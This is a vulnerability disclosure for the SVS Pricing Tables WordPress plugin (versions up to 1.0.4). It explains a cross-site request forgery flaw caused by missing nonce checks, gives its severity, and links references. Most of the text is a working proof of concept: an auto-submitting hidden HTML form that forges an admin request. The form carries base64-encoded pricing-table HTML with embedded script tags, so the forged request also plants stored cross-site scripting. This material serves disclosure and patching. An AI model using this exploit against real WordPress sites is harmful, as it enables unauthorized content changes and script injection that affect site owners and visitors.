Description

The SVS Pricing Tables plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on the savePricingTable() function. This makes it possible for unauthenticated attackers to create and edit pricing tables via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

Severity

4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Affected Version

<= 1.0.4

PoC :

<html>
  <!-- eneriiiii PoC <3 -->
  <body>
    <form action="http://[ASSETS]/wp-admin/admin.php?page=svs_pricing_tables&Action=pricingTableSave" method="POST">
      <input type="hidden" name="name" value="eneriiii&#32;&#45;&#32;XSS" />
      <input type="hidden" name="template" value="t04" />
      <input type="hidden" name="htmlAdmin" value="PHNlY3Rpb24gaWQ9InN2c19wcmljZV9wbGFucyIgY2xhc3M9InN2c19wdF9jbGVhcmZpeCI&#43;CiAgIDxvbCBjbGFzcz0ic3ZzX3ByaWNlX3BsYW4iIHN0eWxlPSIiPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi1zZXR0aW5ncyBvaSIgZGF0YS1nbHlwaD0iY29nIj48L3NwYW4&#43;CiAgICAgIDxzcGFuIGNsYXNzPSJzdnNfaWNvbiBpY29uLWZlYXR1cmVkIG9pIiBkYXRhLWdseXBoPSJzdGFyIj48L3NwYW4&#43;CiAgICAgIDxzcGFuIGNsYXNzPSJzdnNfaWNvbiBpY29uLXRyYXNoLXBsYW4gb2kiIGRhdGEtZ2x5cGg9InRyYXNoIj48L3NwYW4&#43;CiAgIDxsaSBjbGFzcz0ic3ZzX3RpdGxlIj48ZGl2PjxpIGNsYXNzPSJzdnNfaWNvbiBpY29uLW1vdmUgb2kiIGRhdGEtZ2x5cGg9Im1vdmUiPjwvaT48aSBjbGFzcz0ic3ZzX2ljb24gaWNvbi10cmFzaC1vcHRpb24gb2kiIGRhdGEtZ2x5cGg9InRyYXNoIj48L2k&#43;PGgyIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCIgdGl0bGU9IkNsaWNrIHRvIGVkaXQuLi4iPjxzY3JpcHQ&#43;YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyBOQU1FJyk8L3NjcmlwdD48L2gyPjwvZGl2PjwvbGk&#43;PGxpIGNsYXNzPSJzdnNfYnV0dG9uIj48ZGl2PjxpIGNsYXNzPSJzdnNfaWNvbiBpY29uLW1vdmUgb2kiIGRhdGEtZ2x5cGg9Im1vdmUiPjwvaT48aSBjbGFzcz0ic3ZzX2ljb24gaWNvbi10cmFzaC1vcHRpb24gb2kiIGRhdGEtZ2x5cGg9InRyYXNoIj48L2k&#43;PGkgY2xhc3M9InN2c19pY29uIGljb24tbGluayBvaSIgZGF0YS1nbHlwaD0ibGluay1pbnRhY3QiPjwvaT48YSBocmVmPSIjIiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj48c2NyaXB0PmFsZXJ0KCdlbmVyaWlpaWkgPDMgLSBYU1MgQnV0dG9uJyk8L3NjcmlwdD48L2E&#43;PC9kaXY&#43;PC9saT48L29sPgogICA8b2wgY2xhc3M9InN2c19wcmljZV9wbGFuIiBzdHlsZT0iIj4KICAgICAgPHNwYW4gY2xhc3M9InN2c19pY29uIGljb24tc2V0dGluZ3Mgb2kiIGRhdGEtZ2x5cGg9ImNvZyI&#43;PC9zcGFuPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi1mZWF0dXJlZCBvaSIgZGF0YS1nbHlwaD0ic3RhciI&#43;PC9zcGFuPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi10cmFzaC1wbGFuIG9pIiBkYXRhLWdseXBoPSJ0cmFzaCI&#43;PC9zcGFuPgogICA8bGkgY2xhc3M9InN2c19wcmljZSI&#43;PGRpdj48aSBjbGFzcz0ic3ZzX2ljb24gaWNvbi1tb3ZlIG9pIiBkYXRhLWdseXBoPSJtb3ZlIj48L2k&#43;PGkgY2xhc3M9InN2c19pY29uIGljb24tdHJhc2gtb3B0aW9uIG9pIiBkYXRhLWdseXBoPSJ0cmFzaCI&#43;PC9pPjxwPjxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCIgdGl0bGU9IkNsaWNrIHRvIGVkaXQuLi4iPjxzY3JpcHQ&#43;YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyBQcmljZScpPC9zY3JpcHQ&#43;PC9zcGFuPiZuYnNwOzxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCIgdGl0bGU9IkNsaWNrIHRvIGVkaXQuLi4iPi8gbW9udGg8L3NwYW4&#43;PC9wPjwvZGl2PjwvbGk&#43;PC9vbD48b2wgY2xhc3M9InN2c19wcmljZV9wbGFuIiBzdHlsZT0iIj4KICAgICAgPHNwYW4gY2xhc3M9InN2c19pY29uIGljb24tc2V0dGluZ3Mgb2kiIGRhdGEtZ2x5cGg9ImNvZyI&#43;PC9zcGFuPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi1mZWF0dXJlZCBvaSIgZGF0YS1nbHlwaD0ic3RhciI&#43;PC9zcGFuPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi10cmFzaC1wbGFuIG9pIiBkYXRhLWdseXBoPSJ0cmFzaCI&#43;PC9zcGFuPgogICA8bGkgY2xhc3M9InN2c19vcHRpb25fdmFsdWUiPjxkaXY&#43;PGkgY2xhc3M9InN2c19pY29uIGljb24tbW92ZSBvaSIgZGF0YS1nbHlwaD0ibW92ZSI&#43;PC9pPjxpIGNsYXNzPSJzdnNfaWNvbiBpY29uLXRyYXNoLW9wdGlvbiBvaSIgZGF0YS1nbHlwaD0idHJhc2giPjwvaT48cD48c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj5WYWx1ZTwvc3Bhbj4mbmJzcDs8c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj48c2NyaXB0PmFsZXJ0KCdlbmVyaWlpaWkgPDMgLSBYU1MgdmFsdWUnKTwvc2NyaXB0Pjwvc3Bhbj48L3A&#43;PC9kaXY&#43;PC9saT48bGkgY2xhc3M9InN2c19vcHRpb25feWVzX25vIj48ZGl2PjxpIGNsYXNzPSJzdnNfaWNvbiBpY29uLW1vdmUgb2kgIiBkYXRhLWdseXBoPSJtb3ZlIj48L2k&#43;PGkgY2xhc3M9InN2c19pY29uIGljb24tdHJhc2gtb3B0aW9uIG9pIiBkYXRhLWdseXBoPSJ0cmFzaCI&#43;PC9pPjxwPjxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfeWVzX25vIiB0aXRsZT0iQ2xpY2sgdG8gZWRpdC4uLiI&#43;PGltZyBzcmM9Imh0dHA6Ly8xMDMuMTg5LjIzNC41Ny93cC1jb250ZW50L3BsdWdpbnMvc3ZzLXByaWNpbmctdGFibGVzL3RlbXBsYXRlcy90MDQvaW1hZ2VzL3llcy5wbmciPjwvc3Bhbj4mbmJzcDs8c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj48c2NyaXB0PmFsZXJ0KCdlbmVyaWlpaWkgPDMgLSBYU1MgeWVzL25vIG9wdGlvbicpPC9zY3JpcHQ&#43;PC9zcGFuPjwvcD48L2Rpdj48L2xpPjwvb2w&#43;PG9sIGNsYXNzPSJzdnNfbmV3X3BsYW4iPgogICAgICA8c3BhbiBjbGFzcz0iaWNvbi1hZGQgb2kiIGRhdGEtZ2x5cGg9InBsdXMiPjwvc3Bhbj4KICAgPC9vbD4KPC9zZWN0aW9uPg&#61;&#61;" />
      <input type="hidden" name="html" value="PHNlY3Rpb24gaWQ9InN2c19wcmljZV9wbGFucyIgY2xhc3M9InN2c19wdF9jbGVhcmZpeCI&#43;CiAgIDxvbCBjbGFzcz0ic3ZzX3ByaWNlX3BsYW4iIHN0eWxlPSIiPgogICAgICAKICAgICAgCiAgICAgIAogICA8bGkgY2xhc3M9InN2c190aXRsZSI&#43;PGRpdj48aDIgY2xhc3M9InN2c19wdF9lZGl0YWJsZV90ZXh0Ij48c2NyaXB0PmFsZXJ0KCdlbmVyaWlpaWkgPDMgLSBYU1MgTkFNRScpPC9zY3JpcHQ&#43;PC9oMj48L2Rpdj48L2xpPjxsaSBjbGFzcz0ic3ZzX2J1dHRvbiI&#43;PGRpdj48YSBocmVmPSIjIiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiPjxzY3JpcHQ&#43;YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyBCdXR0b24nKTwvc2NyaXB0PjwvYT48L2Rpdj48L2xpPjwvb2w&#43;CiAgIDxvbCBjbGFzcz0ic3ZzX3ByaWNlX3BsYW4iIHN0eWxlPSIiPgogICAgICAKICAgICAgCiAgICAgIAogICA8bGkgY2xhc3M9InN2c19wcmljZSI&#43;PGRpdj48cD48c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiPjxzY3JpcHQ&#43;YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyBQcmljZScpPC9zY3JpcHQ&#43;PC9zcGFuPiZuYnNwOzxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCI&#43;LyBtb250aDwvc3Bhbj48L3A&#43;PC9kaXY&#43;PC9saT48L29sPjxvbCBjbGFzcz0ic3ZzX3ByaWNlX3BsYW4iIHN0eWxlPSIiPgogICAgICAKICAgICAgCiAgICAgIAogICA8bGkgY2xhc3M9InN2c19vcHRpb25fdmFsdWUiPjxkaXY&#43;PHA&#43;PHNwYW4gY2xhc3M9InN2c19wdF9lZGl0YWJsZV90ZXh0Ij5WYWx1ZTwvc3Bhbj4mbmJzcDs8c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiPjxzY3JpcHQ&#43;YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyB2YWx1ZScpPC9zY3JpcHQ&#43;PC9zcGFuPjwvcD48L2Rpdj48L2xpPjxsaSBjbGFzcz0ic3ZzX29wdGlvbl95ZXNfbm8iPjxkaXY&#43;PHA&#43;PHNwYW4gY2xhc3M9InN2c19wdF9lZGl0YWJsZV95ZXNfbm8iIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj48aW1nIHNyYz0iaHR0cDovLzEwMy4xODkuMjM0LjU3L3dwLWNvbnRlbnQvcGx1Z2lucy9zdnMtcHJpY2luZy10YWJsZXMvdGVtcGxhdGVzL3QwNC9pbWFnZXMveWVzLnBuZyI&#43;PC9zcGFuPiZuYnNwOzxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCI&#43;PHNjcmlwdD5hbGVydCgnZW5lcmlpaWlpIDwzIC0gWFNTIHllcy9ubyBvcHRpb24nKTwvc2NyaXB0Pjwvc3Bhbj48L3A&#43;PC9kaXY&#43;PC9saT48L29sPgo8L3NlY3Rpb24&#43;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Reference

  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/svs-pricing-tables/svs-pricing-tables-104-cross-site-request-forgery-to-pricing-table-editcreation
  • https://plugins.trac.wordpress.org/browser/svs-pricing-tables/trunk/app/model/svs_pt_model_main.php#L61